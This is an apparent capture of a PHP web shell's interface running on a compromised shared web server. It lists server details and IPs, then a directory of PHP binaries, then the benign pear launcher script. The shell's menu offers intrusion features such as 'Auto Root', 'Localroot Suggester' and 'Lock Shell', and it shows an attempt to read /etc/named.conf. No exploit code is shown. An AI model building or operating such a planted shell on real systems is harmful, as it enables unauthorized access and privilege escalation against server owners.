Linux sv3046.xserver.jp 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
Apache
Server IP : 202.254.234.47 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : kinomori
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
opt /
php-8.3.10 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
pear
848
B
-rwxr-xr-x
2024-10-21 22:17
peardev
869
B
-rwxr-xr-x
2024-10-21 22:17
pecl
782
B
-rwxr-xr-x
2024-10-21 22:17
phar
14.89
KB
-rwxr-xr-x
2024-10-21 22:17
phar.phar
14.89
KB
-rwxr-xr-x
2024-10-21 22:17
php
53.48
MB
-rwxr-xr-x
2024-10-21 22:17
php-cgi
53.31
MB
-rwxr-xr-x
2024-10-21 22:17
php-config
5.03
KB
-rwxr-xr-x
2024-10-21 22:17
phpdbg
54.32
MB
-rwxr-xr-x
2024-10-21 22:17
phpize
4.41
KB
-rwxr-xr-x
2024-10-21 22:17
Save
Rename
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/opt/php-8.3.10/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/opt/php-8.3.10/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/opt/php-8.3.10/data/pear" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/opt/php-8.3.10/data/pear" INCARG="-d include_path=/opt/php-8.3.10/data/pear" fi fi exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"